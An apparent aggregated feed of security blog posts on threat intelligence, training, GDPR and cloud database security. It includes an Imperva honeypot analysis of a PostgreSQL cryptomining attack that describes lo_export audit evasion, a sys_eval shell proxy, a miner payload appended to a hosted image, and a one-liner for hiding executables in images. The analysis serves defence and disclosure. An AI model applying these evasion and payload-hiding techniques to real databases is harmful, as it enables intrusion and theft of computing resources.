The tools cybercriminals use to achieve this goal vary, but they are all designed to exploit weaknesses, both human and technological, and defeat or disrupt the many layers organizations put in place to protect their critical assets. It’s the ultimate game of cyber cat and mouse in which the opponents deploy cunning techniques to trick innocent bystanders into letting their guard down. Investment in robust, cutting-edge security systems and thorough training are crucial to prevent such activity.

Of course, the security teams we have in place to protect our digital information deserve a lot of credit for applying their know-how and skills to use advanced capabilities such as artificial intelligence (AI)-powered network monitoring and timely threat intelligence. If you stop and think about it, threat data really is a make-or-break part of the security playbook. Many people either take it for granted or just assume it’s something to toss into the mix and forget about. Few realize how threat intelligence can empower an organization’s security team.

Cyberdefense Is a Team Sport

The Ponemon Institute’s “2017 Cost of Data Breach Study” supported this premise, noting that the time it takes to identify and contain a data breach has been reduced due to “investments in such enabling security technologies as security analytics, SIEM, enterprisewide encryption and threat intelligence sharing platforms.

When your security systems have the most current intelligence, your analysts can make educated decisions with detailed information. Like a basketball team seamlessly working together on the court, you and your security team can use threat intelligence to get ahead in the big game of cyberdefense.

So what does this mean for your organization? Are you ready cut down the nets, so to speak? To gear up, make sure you’re taking advantage of the IBM X-Force Exchange to strengthen your defenses. By collecting and sharing threat intelligence, you can create the best playbook to help your security team research threats, collaborate with peers, and take swift and coordinated action to protect corporate and customer data.

Visit the X-Force Exchange and start sharing threat intelligence

The post Know Your Security X’s and O’s: Your Cyberdefense Team Is Only as Good as Its Threat Intelligence appeared first on Security Intelligence.

Why IT Compliance Is Critical for Cyber Security

IT compliance is sort of like the forgotten stepchild of cyber security. It doesn’t get as much attention as data breach prevention technologies and policies, even though it is equally

The post Why IT Compliance Is Critical for Cyber Security appeared first on The Cyber Security Place.

Five Surprising Reasons to Invest in Better Security Training

The conventional wisdom about security training needs an update — and for reasons that may surprise you.

Cyberattacks are rising in frequency, severity and the damage they cause. Since the weakest link in any networked chain is the user, employee training is a vital part of a comprehensive program that also requires world-class software and savvy policy.

You know all that, but there are other, less obvious reasons to invest in better training that even the most grizzled IT security veteran may not fully appreciate.

Surge of Insider Attacks Suggests Need for Better Security Education

The 2017 IBM X-Force Threat Intelligence Index report showed that a shocking number of incidents come from insiders, employees and other trusted people. Seventy-one percent of attacks against healthcare companies fall into this category, while 58 percent of incidents in financial services, the most-attacked sector, originate from insiders.

The majority of these insiders are inadvertent actors — mostly employees who were tricked into initiating the attacks. These numbers expose the inadequacy of today’s normal training programs. They’re not frequent, memorable or thorough enough. In other words, they’re not working.

The bottom line is that training has not kept up with the evolution of cyberthreats or their remedies. That’s why it’s more important than ever to implement the best possible tools to protect sensitive data. But decision-makers must remember that even the best software cannot stop all threats.

For example, any employee with access to any phone anywhere at any time is potentially vulnerable to social engineering. The reality of bring-your-own-device (BYOD) environments is that employees may be connecting to company resources at all hours and exposing their devices to threats in arbitrary locations and over insecure networks. That’s why great software and solid policies must be accompanied by more frequent and better training.

Five Reasons Why Improved Training Is Vital to Data Security

Of course, training exists to educate employees about threats. Don’t click on that suspicious email link. Don’t insert that thumb drive you found in the parking lot. Don’t keep your password on a note card stuck to your monitor.

But security training should be about far more than just teaching employees to avoid common errors. Below are five surprising reasons why training is vital.

1. Morale

Accelerating threats affect employees most directly by causing unwanted changes in how they work. Security rules implemented without follow-up can feel like an imposed burden. Good training makes employees feel like partners in these policy changes.

2. Speed to Remedy

Better training enables employees to more effectively spot and report suspicious activity. Confusion causes paralysis, but education promotes action. That means faster average resolution times and better institutional learning.

3. Self-Policing

Most threats come from the inside, not the outside. When employees know where threats come from, they’re in a better position help each other avoid unwitting participation in a breach — and to report deliberate participation.

4. Compliance

Rising security threats have ushered in a new era of regulation. That means decisions around security and privacy come with more regulatory and legal ramifications than ever before. It also makes everything more complicated. There’s simply more to learn now, and that demands more and better training. The burden of compliance can also change institutional thinking and lead to a harmful compliance-first mindset. Training helps employees comply with regulations without taking the focus off actual, practical security.

5. Informed Purchase Decision-Making

The most important internal group to train is also the hardest: C-level executives, managers and team leaders. One of the biggest institutional problems around security is the failure to invest in the best solutions. This is often a direct result top decision-makers’ lack of knowledge. Trainings that expose leaders to the risks of today’s increasingly damaging breaches — and the rewards of being ready for them — can be very effective.

It’s Time to Get Creative With Security Training

Cybercrime is being industrialized, automated and optimized using big data analytics and artificial intelligence (AI). Much of that AI is applied to the social engineering of employees. Annual go-through-the-motions training won’t cut it anymore. It’s time to be proactive and get creative.

Don’t think of training as something that happens only at scheduled sessions. It must be constant and continuous. For example, security leaders can create fake malware or phishing attacks. When employees click or open them, serve up a quick training on why they just made a huge error and what to do if this happens again. Security teams might also consider publishing a newsletter or internal podcast to raise security awareness throughout the organization.

As threats evolve and grow more complex and damaging, it’s imperative to rethink how the organization as a whole learns and grows. By educating employees about how cyberthreats affect them, their data and their jobs, IT leaders can make security personal and steer the organizational culture toward security consciousness.

Listen to the podcast series: Take back control of your cybersecurity now

The post Five Surprising Reasons to Invest in Better Security Training appeared first on Security Intelligence.

Steps to Take to Beat the Insider Threat in 2018

Hackers get the headlines, but a data breach is more likely to originate inside your own office walls. Errors, negligence and malicious intent by employees are the leading causes of

The post Steps to Take to Beat the Insider Threat in 2018 appeared first on The Cyber Security Place.

Government Leaders Rank Cybersecurity Threats as Top Trend Affecting Communications, Survey Reveals

Cybersecurity threats constitute the top trend affecting government communications, a recent survey of local councils and leaders revealed.

In Vision’s 2018 research brief titled “What’s Next in Digital Communications for Local Government,” more than one-quarter (27 percent) ranked cybersecurity threats as the top factor influencing how their government communicates and operates. Citizen engagement ranked slightly lower among survey participants at 24 percent, followed by social media at 13 percent.

Cybersecurity Is Top of Mind for Government Leaders

These concerns help explain why security is at the top of respondents’ minds for 2018: 41 percent of surveyed parties told Vision, a service that builds, develops and hosts websites for local governments, that minimizing cybersecurity risk is among their top priorities for the year, behind only expanding citizen engagement (66 percent), and improving web accessibility and adherence to Web Content Accessibility Guidelines (WCAG) 2.0 (53 percent).

David Nachman, general manager of content management solutions for Vision, said these considerations among local government leaders reflect the concerns of their constituents.

“It’s clear that local agencies are well aware of the rising expectations of their increasingly digital and mobile citizens who now demand the same level of accessibility, security and efficiency they enjoy in the private sector,” Nachman wrote in an article on GCN.

Cybersecurity Threats: A Persistent Problem

The Vision report underscored persistent cybersecurity challenges confronting governments. According to Netwrix’s “2017 IT Risks Report,” 65 percent of governments said they suffered a breach in 2016. Only 26 percent said they felt prepared to defend their data against cyberthreats.

At the same time, nearly half of government employees that responded to a recent Dtex survey said they take no responsibility for cybersecurity. Even worse, one-third of participants said they believe they are more likely to be struck by lightning than to suffer a data breach.

To address these ongoing issues, Dtex advised governments to adopt a layered approach to cyberdefense that consists of building a positive security culture in the workplace and using intelligent, automated data protection tools.

The post Government Leaders Rank Cybersecurity Threats as Top Trend Affecting Communications, Survey Reveals appeared first on Security Intelligence.

Failure to Communicate Critical Data Risk to Business Leaders Can Have Perilous Consequences

Greater cybercriminal sophistication, regulations and customer privacy expectations are ushering in a new era of data security accountability. Critical data and information — including customer information, intellectual property and strategic plans — are key to organizations’ competitiveness, but a breach of this data can have disastrous consequences.

Business leaders must play an active role in protecting against the risks associated with breaches of critical business data and intellectual property. But IT, security and risk teams speak a different language from business leaders and often struggle to equip them with the information they need to make effective decisions. Tools that give executives business-relevant data security visibility can help bridge the divide.

Who Is Accountable for Data Security?

Though data security has long been the purview of IT and security teams, the market is shifting, and business executives must take notice. IBM commissioned Forrester Consulting to survey 150 IT, security and risk decision-makers to examine their approach to protecting their company’s critical information and communicating data risk to senior business executives.

The Forrester report, “Is Your Company in Peril If Critical Data Is Breached?,” found that CEOs and boards of directors are most accountable to external stakeholders when data is compromised. It’s no longer optional: Business leaders must play an active role in protecting their company’s critical data assets. As recent, highly publicized breaches have demonstrated, their firm’s reputation and stock price, as well as their jobs, are at stake.

Forrester Infographic: The Data Risk Imperative © 2018 Forrester Research, Inc. All right reserved.Source: Forrester Research

Read the complete Forrester Report: Is Your Company In Peril If Critical Data Is Breached?

Opportunities and Threats Are Intertwined

With the opportunity to use data to improve business operations and customer experiences comes the threat of data compromise and loss. But before IT and business executives can take on their data security responsibilities, they must first identify their company’s critical assets — the ones that are key to the organization’s success and would pose considerable risk if compromised.

Over 70 percent of IT and security professionals believe it’s important for business executives to have visibility into a long list of data security metrics. IT and security professionals struggle to distinguish between tactical, operational and strategic security priorities.

However, it is imperative that they are able to communicate these very priorities to business leaders, who often lack security expertise, in a language they understand. While it may be tempting to develop a long list of metrics for everyone, security information needs to be explained in a context that the intended audience can relate to and comprehend.

Investing in Security Controls to Protect Critical Data

Seventy-nine percent of respondents to the Forrester study said they feel they can justify the business case for a centralized, business-friendly command center with these capabilities. To help avoid disastrous consequences, including incident response costs, regulatory fines, plummeting stock prices and shattered reputations, a data risk management program is critical.

Investing now in data security controls that align IT, security and the business can help prevent costly breaches down the road and ensure that key stakeholders come together to help execute the company’s security strategy.

To learn more, join our webcast, “Bridging the Data Risk Divide,” on April 9, featuring guest speakers Heidi Shey, senior analyst serving security and risk for Forrester, and Daniel Goodes, worldwide data security technical leader IBM. They will discuss recent Forrester research surrounding data risk management.

Register for the April 9 Webinar: Bridging the Data Risk Divide

The post Failure to Communicate Critical Data Risk to Business Leaders Can Have Perilous Consequences appeared first on Security Intelligence.

Compliance functions make a turn towards innovation-fueled strategies

Faced with growing threats of ‘industry shocks’ such as cyber fraud, cryptocurrency, quantum computing and open banking, financial institutions expect to increase their compliance investments over the next two years as they seek new approaches to strengthening compliance capabilities, according to a new report from Accenture. Compliance investments increase Based on a survey of 150 compliance executives at financial services institutions, Accenture’s fifth annual compliance risk report, “Comply and Demand,” found that 89 percent of … More

The post Compliance functions make a turn towards innovation-fueled strategies appeared first on Help Net Security.

A Letter From the Future: It’s January 2019 and Hackers Are Stealing Your Data

This article was published on LinkedIn on March 27, 2018. You can read the original post here.

In my first LinkedIn article, I’d like to welcome you to the future. Not too far in to the future. But, it’s January 2019 and unfortunately cyber criminals are stealing your data. You’re scrambling to respond, hustling to contain, scurrying to an emergency board meeting. It’s a bad day.

You may be thinking that this isn’t going to happen to you, but many recent headlines say otherwise. So this is my humble letter that I wish I had gotten to you 10 months ago. Today.

From my chair, running IBM’s cybersecurity unit, I get to see things that don’t even make it to the news. Yesterday, we actually helped check references on a hacker for a customer wondering if they should pay bitcoin to get their servers back. This morning, my research team in Israel uncovered a new organized criminal circuit developing a new method to steal money from banks in Brazil. And just in the last 24 hours, my threat intelligence team received indicators of 30 new domains registered by hackers as command and control servers for their malware.

But here’s the thing…even though cybercrime is becoming significantly more sophisticated, there are things we can do that can make a difference. Here are my current top three:

1. Prepare Your Response.

My first advice is that “response” isn’t something that should be considered after a breach is detected, but rather something that needs to be planned and rehearsed way ahead of time.

An effective response to a cyber incident requires preparation and planning — a playbook — as well as training and rehearsing, in the same way hospitals prepare for emergencies. As we’ve seen with recent cyberattacks, often a company’s response can do more damage than the breach.

Last year IBM opened the world’s first “cyber range” for the private sector — a place where clients come for rigorous training to prepare for a potential cyberattack. It’s been an eye opener for us and the 1,400-plus people who have trained there.

Our big take away is that this isn’t just a technical team problem — the response needs to span every function in your organization. An effective response plan includes not just the security team’s role in detecting and remediating a breach, but how your organization reacts to regulators, your Board of Directors, law enforcement, clients, employees, the media and other constituents.

Such training and rehearsing helps organizations develop and regularly update a highly detailed and coordinated response plan, and build “muscle memory” that can be thrown into action when a breach occurs.

Most organizations don’t have this. A study we released this week shows nearly 80 percent of organizations surveyed said they cannot remain resilient after a cyberattack due to a lack of planning. And the longer it takes to respond, the higher the costs. For example, a breach contained in less than 30 days saves an organization, on average, nearly $1 million.

2. Change the Game With AI.

AI has the capability to ingest, comprehend and analyze the enormous amount of security data, in whatever forms, that are out there today, and can be deployed quickly. It will help you detect and respond to cyberattacks at speed and scale. More than that, cognitive systems make correlations that provide insight to detect potential breaches much faster than humans alone.

AI will give your security analysts much needed help in finding the needle in the haystack so they can concentrate on stopping the attack.

AI in the form of machine learning enables you to do things like determine if an employee’s identity has been compromised by deeply understanding user behavior and detecting anomalies that could indicate an insider threat. Machine learning can automatically scan new applications for vulnerabilities so developers can continue to move quickly, confident that their app is secure. And when it comes to mobile, AI can see what’s going on at the endpoint and dynamically make recommendations on policies, patches and relevant best practices to keep devices secure.

3. Master the Basics.

Good security hygiene — from keeping software patches updated to scanning applications for vulnerabilities — still count, maybe more than ever. And from where I sit, not enough companies are focusing on the mundane, hard work of getting the basics right — 100 percent of the time. Any less than that will leave you open to an attack.

Think about cyber security the same way that an engineering or manufacturing company thinks about safety and quality. An auto manufacturer would never accept just a few defective parts leaving the plant. An oil company would not be satisfied losing five percent of its drilling rigs. You should not be satisfied with anything less than perfect either. Drive that into your culture.

I’m not saying these so-called basics are easy to get right. I know your teams are challenged with an enormous — and growing — amount of security data. Whether it’s the potentially 200,000 security events you see every day, or the 60,000 alert blogs your security analysts need to read each month — all of which needs to be analyzed quickly to find anomalies that may indicate a pending cyberattack. And the significant skills shortage we’re facing in cybersecurity, with an estimated 1.5 to 2 million unfilled security jobs by the end of this decade, is making it even more difficult.

But at the end of the day, this quality control is worth the effort. Mastering these basics from the outset will allow you to react more quickly in the wake of an attack — potentially saving millions of dollars, and significant losses to your reputation. Not only that, it will also help close the gaps so that you’re dealing with less of these incidents in the first place.

To wrap up, cybercrime is one of our generation’s most significant issues, equally impacting the public and private sector, as well as consumers and citizens. The basics matter, how you handle an attack makes all the difference in the world, and with AI we have a fighting chance to get ahead of the criminals.

The post A Letter From the Future: It’s January 2019 and Hackers Are Stealing Your Data appeared first on Security Intelligence.

Qualys integrates with Google Cloud Platform’s Security Command Centre

Qualys and Google Cloud Platform can now play nicely together with the launch of the security firm’s Cloud Security Command Center (Cloud SCC) integration.The security and data risk platform will

The post Qualys integrates with Google Cloud Platform’s Security Command Centre appeared first on The Cyber Security Place.

Insurance and Corporate Vigilance Against Cyber Breaches: 5 Steps to Take in the Absence of Cross-Industry Protocols

Despite the lack of bright-line procedures, there are five risk reduction measures a company may consider implementing to reduce its potential exposure to cyber breaches, strengthen its security protocols, and

The post Insurance and Corporate Vigilance Against Cyber Breaches: 5 Steps to Take in the Absence of Cross-Industry Protocols appeared first on The Cyber Security Place.

Data Security Solutions for GDPR Compliance

Enforcement of the new EU General Data Protection Regulation (GDPR) adopted in 2016 starts on May 25, 2018. It requires all organizations that do any business in the EU or that collect or process personal data originating in the EU to comply with the regulation. Organizations that do not have a physical office in the region or do not process personal data in an EU member country are not exempt from the GDPR. Those that fail to comply can face very strict fines—as much as $22.3 million or up to four percent of total worldwide revenue for the preceding financial year, whichever is higher.

Key articles that pertain to data security (Figure 1) are summarized below from the lengthy 88-page document GDPR:

  • Article 25: Data protection by design and by default
  • Article 32: Security of processing
  • Article 33: Notification of data breaches to the appropriate regulator
  • Article 35: Data protection impact assessment
  • Article 44: General principle for data transfer

We’ve previously written about the professional services we offer that assist with GDPR compliance. In this post, we discuss our products in more detail and how they map to the GDPR data security-specific articles above. Here are five ways Imperva data security solutions can help organizations meet GDPR compliance requirements.

Mapping GDPR data security requirements to Imperva solutions

Figure 1: Mapping of key GDPR data protection requirements to Imperva data security solutions

Data Discovery and Classification

GDPR requires that organizations create and maintain a detailed inventory of personal data, and then classify that data by assigning a risk profile and priority. To achieve this requirement, the first step is to understand where databases are located and what type of information they hold. Imperva SecureSphere finds both known and unknown databases by automatically scanning enterprise networks. You can easily create custom data discovery policies to scan any part of your network. To ensure continuous discovery to include new data in security and protection efforts, SecureSphere enables automated, scheduled scans. Automated, scheduled scans allow you to develop and maintain an updated inventory of data scattered across your organization.

Masking or Pseudonymizing Personal Data

The GDPR requires organizations practice data minimization and purpose limitation. This means they collect and use data limited to only what is necessary for a specific purpose, retain it no longer than necessary and limit access to a need-to-know basis. As an example, if an insurance company collects personal information for the purposes of issuing a policy, they cannot use that data for pricing analysis because the personal data collected for one purpose (e.g., issuing a policy) cannot be used for a new purpose (e.g., creating a database for pricing analysis). However, if the data is pseudonymized via data masking, then they could use the masked data for pricing analysis, which is beyond the original collection purpose.

Pseudonymized data, according to the GDPR, is data that has been de-identified such that the data cannot directly identify the subject. Imperva Camouflage obfuscates personal data through data masking that replaces real data with realistic fictional data that is functionally and statistically accurate. It reduces risk of data breach while enabling data utility for business needs.

Security of Processing

Making sure that personal data is secure is the cornerstone of the GDPR. It states that those handling data, such as data controllers and data processors, need to introduce appropriate technical and organizational measures to secure the data. SecureSphere helps you protect data by identifying database vulnerabilities and monitoring database activity.

Database Vulnerability Assessments

The GDPR requires ongoing protection and regular testing and verification of technical and organizational measures used to ensure security of processing. Continuous database vulnerability assessments identify risks to personal data. Imperva SecureSphere finds those security holes in your databases that attackers can exploit. It has a library of over 1,500 pre-defined tests and scans database servers and the OS platforms for vulnerabilities and misconfigurations such as missing patches, default passwords or misconfigured privileges. You can also generate assessment reports that provide concrete recommendations to mitigate identified vulnerabilities and strengthen the security posture of a scanned database server.

Monitoring Data Access Activity

Data activity monitoring is critical under the GDPR as it requires organizations maintain a secure environment for data processing. To meet GDPR requirement, you need to be able to answer these questions: Who is accessing the data? And how is data being used?

With SecureSphere you can gain complete visibility into data activity by continuously monitoring and analyzing all database activity, including local privileged user access and service accounts, in real time. Monitoring and auditing database activity helps ensure that personal data is being used appropriately and being accessed by authorized users. With data monitoring you can also prevent data theft from external attacks like SQL injections and protect against insider threats − malicious, careless, or compromised users. By keeping a watchful eye on the data, you can identify and block suspicious or unauthorized data access before they become breaches.

Breach Detection and Incident Response

In the event of a personal data breach, the GDPR dictates that data controllers must notify the supervisory authority “without undue delay and, where feasible, not later than 72 hours after having become aware of it.” If notification is not made within 72 hours, the controller must provide a reasoned justification for the delay.

The biggest challenge is that security teams are overwhelmed with large volumes of incident alerts and that truly worrisome incidents get lost in the noise. Imperva CounterBreach leverages advanced machine learning and peer group analysis to prioritize data access incidents that require immediate attention – without security teams needing deep knowledge of the data environment. It analyzes user behavior and data access activities to identify truly worrisome (or dangerous) incidents, reducing the window of exposure.

Enforcing Cross-Border Data Transfer Policies

The GDPR imposes restrictions on the transfer of personal data outside the European Economic Area (EEA) to ensure that data protection and privacy requirements outlined in the regulation are not undermined. Article 44 of the GDPR prohibits the transfer of personal data beyond the EEA, unless the recipient country can prove adequate data protection.

SecureSphere helps you enforce requirements outlined in model contracts and binding corporate rules (BCRs). Ongoing database discovery and classification scans ensure new databases and personal data are cataloged and protected. Policies can be created to inspect the database traffic. When policy violations occur, such as unauthorized access, blocking user connections or terminating a transaction can help ensure appropriate cross-border data access and use.

Contact us to learn more about Imperva’s GDPR compliance capabilities and explore our data security solutions in detail.

Three Pitfalls to Avoid on Your Data Security Journey

The European Union’s General Data Protection Regulation (GDPR) has shifted attention to the security and privacy of customer data. But more importantly, the regulation calls for enterprises to assess existing data security policies, processes and enforcement mechanisms — a practice that in my experience generally gets completed moments before an audit.

Data Security Takes the Lead

Compliance continues to be a main driver of data protection technologies such as encryption, tokenization, data loss prevention, and file access monitoring and alerting. Roughly half of the enterprise inquiries IDC receives about data security technologies, strategy and best practices result from a failed audit, a significant security incident or a data breach.

While many of these discussions seek to identify and examine subtle security solution differentiators, one common element is clear: The failed audit, security incident or data breach stemmed from a policy flub or process breakdown that resulted from a change to the environment — a new or altered business initiative or newly installed productivity software — that wasn’t fully vetted. It’s usually the “people” part of the people, process and technology equation that creates a cascading breakdown.

GDPR, which takes effect in May, isn’t very prescriptive. Its recommendations largely point to the need for a comprehensive data security strategy. The only technology recommendation specifically called out in the document is encryption.

The language of the regulation will be discussed and debated by legal teams until the first fines are levied and the measure’s true teeth are tested in court. The essential point is that meeting the spirit of the regulation requires a careful assessment of the existing state of an organization’s data security program, a possible refresh of data governance policies, a reconfiguring of existing security controls and potential process changes.

The Three Pitfalls

Undertaking such an exercise is no easy feat, and it must involve all stakeholders to avoid any possible missteps. I’ve noted the following pitfalls from discussions with auditors, enterprise chief information security officers (CISOs) and other security practitioners over the years.

1. Failure to Conduct a Comprehensive Assessment

Organizations must know where the most critical data resides. Understanding this requires both discovery tools and an actual discussion with data owners, business partners and other stakeholders. Organizations are creating and using data at an unprecedented level, and over the last several years, data has become richer and more unstructured.

IDC’s Digital Universe Study found that in 2017 the amount of data created, captured and replicated exceeded 10 zettabytes. The good news is that much of this data doesn’t need encryption and is rarely stored. But some of it requires attention. The question to ask data owners is: If exposed or lost, what data would be catastrophic to the business?

2. Failure to Adequately Deploy Security Controls

Organizations deploy encryption, implement data and file activity monitoring, and ensure adequate compliance automation and auditing, but they often fail to address the weakest and most likely pathway of an attack. A security incident generally takes place because an insider or external attacker bypasses these safeguards.

Such incidents may stem from enterprises historically investing in siloed security products. Security controls can’t be comprehensive unless they integrate with identity and access management (IAM) systems, endpoint security software, network security appliances, security information and event management (SIEM) platforms and other IT security tools.

3. Failure to Keep Pace With Change

Even organizations that properly implemented data protection have been victims of breaches. A review of insurance claims associated with data breaches found that some organizations fail to keep track of altered network infrastructure — alterations often due to shifts in business strategy. Key assets that need to be protected are sometimes forgotten.

Mistakes happen, too. Technology rarely solves the problem of human fallibility. For example, a security consultancy conducting a risk assessment at a healthcare organization found that even though financial files were stored on an encrypted server, the team deploying the server on the network assigned it to the guest Wi-Fi.

More Than One Bottom Line

GDPR measures shed light on how digital business transformation strategies at enterprises are impacting society. Sharp, competitive organizations are continuously analyzing customer data to provide new and improved services. The insight gleaned from this analysis attempts to identify and adapt to potentially disruptive changes and, in turn, create new business models, products and services that enhance the customer experience.

While the effective use of data results in improving operational efficiencies and organizational performance, IT teams need to consider the impact to their risk mitigation strategies. Consider the data that’s the lifeblood of your organization and allocate resources based on risk rather than simply addressing a compliance checklist.

Listen to the podcast: Avoiding Common Data Security Mistakes

Notice: Clients are responsible for ensuring their own compliance with various laws and regulations, including GDPR. IBM does not provide legal advice and does not represent or warrant that its services or products will ensure that clients are in compliance with any law or regulation. Learn more about IBM’s own GDPR readiness journey and our GDPR capabilities and offerings to support your compliance journey here.

The post Three Pitfalls to Avoid on Your Data Security Journey appeared first on Security Intelligence.

A Deep Dive into Database Attacks [Part III]: Why Scarlett Johansson’s Picture Got My Postgres Database to Start Mining Monero

As part of Imperva’s efforts to protect our customers’ data, we have an ongoing research project focused on analyzing and sharing different attack methods on databases. If you aren’t familiar with this project, which we call StickyDB, please read Part I and Part II. There we explain this database honeypot net (Figure 1), which tricks attackers into targeting our databases so we can all learn from it and get more secure.

We just saw an interesting attack technique applied to one of our PostgreSQL servers. After logging into the database, the attacker continued to create different payloads, implement evasion techniques through embedded binaries in a downloaded image, extract payloads to disk and trigger remote code execution of these payloads. Like so many attacks we’ve witnessed lately, it ended up with the attacker utilizing the server’s resources for cryptomining Monero. As if this wasn’t enough, the attack vector was a picture of Scarlett Johannsson. Alright then. Let’s take a deep dive into the attack!

Postgre Database attack

Figure 1: The StickyDB honeypot net environment

Establishing Remote Code Execution and Evading DAM Solutions

PostgreSQL, like other common databases, has a metasploit module to ease interaction with the operating system. The method used in this attack is very similar – creating a payload in runtime by dumping to disk the binary code using lo_export function. One slight change has been taken in this module and it’s inserting the lo_export function as an entry in pg_proc catalog instead of making a direct call. This is in order to evade some database audit monitoring (DAM) solutions that closely monitor privileged operations attempts like lo_export. So using obj6440002537 is basically an indirect call to lo_export (Figure 2).

Figure 2: Evasion technique of indirect call to lo_export

Figure 2: Evasion technique of indirect call to lo_export

 

“OK, I took control of your database. Now which GPU do you have?

Now the attacker is able to execute local system commands using one simple function – fun6440002537. This SQL function is a wrapper for calling a C-language function, “sys_eval”, a small exported function in “tmp406001440” (a binary based on sqlmapproject), which basically acts as proxy to invoke shell commands from SQL client.

So what will be next steps of the attack? Some reconnaissance. So it started with getting the details of the GPU by executing lshw -c video and continued to cat /proc/cpuinfo in order to get the CPU details (Figures 3-4). While this feels odd at first, it makes complete sense when your end goal is to mine more of your favorite cryptocurrency, right?

Figure 3: Checking the GPU details

Figure 3: Checking the GPU details

Figure 4: Checking the CPU details

Figure 4: Checking the CPU details

Up until now, the attacker has gained access to the database, established a way for remote code execution as well as evading DAM solutions and learned about the system details. Now it is all set up to… download a picture of Scarlett Johansson?! Wait, what?

A malware payload masquerading as Scarlett Johansson’s picture

Attackers are getting more and more creative I must say.

In this case the attackers wanted to download their latest piece of malicious code, so they hosted it as an image in imagehousing.com, a legit place to host and share your images freely. However, the payload is in binary format and not an image. Renaming your binary to have an image extension will most likely fail during upload to the image hosting provider for the very simple reason that it is not a valid, nor viewable, picture – so no preview and no picture. Instead of renaming the file extension, the attacker appended the malicious binary code into a real picture of the lovely Scarlett Johansson (Figure 5). This way the upload succeeds, the picture is viewable, appears benign and the payload is still there.

Figure 5: The payload. When opening it, it appears as benign picture. No worries – this picture in this blog is clean, that’s for sure!

Do you see the binary code? It’s right below her left elbow! 🙂

We contacted imagehousing.com about the issue and the image has been deleted.

From downloading a picture to cryptomining monero

So downloading the image (art-981754.png) with the payload was easily done with wget. Extracting the executable out of this image was done with dd (data duplicator) command and setting execution permissions, actually full permissions (chmod 777) to the newly created file – x4060014400. The last step is to run this just newly extracted payload, and all in SQL, as follows –

Figure 6: How to use SQL to download a picture, extract binary payload out of it and execute it

Figure 6: How to use SQL to download a picture, extract binary payload out of it and execute it

The x4060014400 file creates another executable, named s4060014400. This executable’s goal is to mine Monero (XMR) to the Monero pool at https://monero.crypto-pool.fr/, IP 163.172.226.218 (Figure 7). This attack’s Monero address has done more than 312.5 XMR so far, valued with more than $90,000 to date. Its address is:

4BBgotjSkvBjgx8SG6hmmhEP3RoeHNei9MZ2iqWHWs8WEFvwUVi6KEpLWdfNx6Guiq5451Fv2SoxoD7rHzQhQTVbDtfL8xS

Figure 7: SQL statement to start mining Monero

Figure 7: SQL statement to start mining Monero

And of course when done, clean up takes place –

Figure 8: Cleaning up file traces

Figure 8: Cleaning up file traces

From the attacker’s standpoint: Mission accomplished!

Do antiviruses identify these malicious pictures?

Using Google’s VirusTotal, we checked the detection rate of almost 60 antiviruses with three different forms of the cryptominer in this attack – the URL that hosted the malicious image, just the malicious image and just the cryptominer. The results are:

  • The URL which hosted the malicious image: One antivirus alerted it is malware (Figure 9)
  • The malicious image: Three antiviruses alerted on coinminer (Figure 10)
  • The extracted cryptominer from the malicious image: 18 antiviruses detection (Figure 11)

Figure 9: One antivirus detected the malicious URL

 

Figure 10: Three antiviruses detected the malicious picture

Figure 11: Eighteen antiviruses detected the cryptominer

Using this trick of appending binary code to legit files (images, documents) to create such a mutated file is a really old-school method, but it still bypasses most of the antiviruses, which is shocking.

And creating such a mutated file is as simple as this one-liner:

Linux: cat myExecutableFile >> myImageFile.png

Windows: type myExecutableFile.exe >> myImageFile.png

How can an attacker find PostgreSQL databases?

An attempt to discover PostgreSQL instances in a domain can be done using discovery tools, such as Nmap, considering the attacker is inside the local network already. But can attackers find easier targets? What about publicly exposed PostgreSQL databases? We know it is bad practice, but are there any such databases out there? Well, yes, at least 710,000 of them, heavily hosted on AWS (Figure 12). And finding them is as easy as a Googling experience using online services like Shodan. So an attacker can easily find those, try to brute force the default postgres user in order to get in and then apply some of the techniques we described.

Figure 12: 710K PostgreSQL instances with public IP address. Credit: shodan.io

Figure 12: 710K PostgreSQL instances with public IP address. Credit: shodan.io

We’ll discuss more attacks in the next article in this series. The last article will be all about attack mitigations, but here are a few quick tips to help you avoid getting hit with this attack

  • Watch out of direct calls to lo_export or indirect calls through entries in pg_proc
  • Beware of functions calling to C-language binaries (as in Figure 2)
  • Use a firewall to block outgoing network traffic from your database to the internet
  • Make sure your database is not assigned with public IP address. If it is, restrict access only to the hosts that interact with it (application server or clients owned by DBAs)

RDaaS Security: How to Apply Database Audit and Monitoring Controls

As you move databases to cloud database platforms, data security and compliance requirements move along with it. This article explains how you can apply database audit and monitoring controls when migrating your database to cloud services, including the following:

  • Introduction to RDaaS
  • Benefits of RDaaS Adoption
  • Who is responsible for DB security in the cloud?
  • Taking steps to ensure relational database security in the cloud

Introduction to RDaaS

Relational Database as a Service (RDaaS) provides the equipment, software, and infrastructure needed for businesses to run their database on RDaaS, rather than putting something together in-house. Examples of RDaaS include AWS Relations Database Services (RDS) and Microsoft Azure SQL Relational Database Service

Benefits of RDaaS adoption

The advantages of RDaaS adoption can be fairly substantial. Here are just a few of the benefits:

  • Allows you to reserve capital rather than using it for equipment or software licenses
  • Reduce expenses related to hiring highly-skilled staff and/or consultants
  • Eliminates the pain points associated with building a database system
  • Requires no additional IT staff to maintain the database system
  • Utility fees required to operate an RDaaS are the responsibility of the cloud provider
  • Resiliency and dependability are guaranteed by the cloud provider
  • Cloud provider database teams are experienced, and know how to handle a variety of bugs and problems
  • The RDaaS provider is often housed at a hardened site, and is therefore less vulnerable to natural disasters, loss of power, and other disruptions that could otherwise affect your daily operations.
  • The RDaaS provider is competitively-focused on providing the best possible service. It can devote substantial resources to optimizing equipment and recruiting qualified personnel.

Who is responsible for cloud-based DB security?

From a high-altitude viewpoint, cloud security is based on a model of “shared responsibility” in which the concern for security maps to the degree of control any given actor has over the architecture stack.

Amazon states that AWS has “responsibility for security of the cloud,” while customers have “responsibility for security in the cloud.” What does that mean for you?

Cloud vendors provide the tools and services to secure the infrastructure (such as networking and compute machines), while you are responsible for things like network traffic protection and application security. For example, cloud vendors help to restrict access to the compute instances on which the web server is deployed (by using security groups/firewalls and other methods); they also deny web traffic from accessing restricted ports by setting only the needed HTTP or HTTPS listeners in the public endpoints (usually the load balancer).

But public cloud vendors do not provide the necessary tools to fully protect against application attacks such as the OWASP Top 10 risks, automated attacks or database vulnerabilities. The responsibility falls to you to establish security measures that allow only authorized web traffic to enter your cloud-based data center— just as with a physical data center. Securing your data in physical data centers is typically done by a  database activity monitoring against the database and fortunately, similar measures can be deployed in the public cloud as well.

How Imperva SecureSphere ensures database compliance and security in the cloud

